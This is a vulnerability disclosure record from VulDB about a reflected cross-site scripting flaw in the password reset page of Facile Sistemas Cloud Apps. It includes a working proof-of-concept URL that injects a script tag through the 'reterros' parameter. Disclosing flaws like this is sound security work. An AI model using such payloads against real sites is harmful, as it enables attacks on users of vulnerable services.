| Title | Facile Cloud Apps Facile Sistemas N/A Cross Site Scripting |
|---|
| Description | Vendor: https://facilesistemas.com.br/blog/
In this case, there is no specific version for the service
PoC:
An error is displayed in the password reset functionality that can be handled via URL. By inserting a payload into the manipulable value, in the reterros parameter, it was possible to exploit XSS.
XSS:
https://portal.example.com.br/account/forgotpassword?reterros=%22%3E%3Cscript%3Ealert(9)%3C/script%3E |
|---|
| User | c4ng4c3ir0 (UID 38456) |
|---|
| Submission | 01/07/2025 14:05 (1 Year ago) |
|---|
| Moderation | 01/19/2025 20:47 (12 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 292596 [Facile Sistemas Cloud Apps up to 20250107 Password Reset /account/forgotpassword reterros cross site scripting] |
|---|
| Points | 16 |
|---|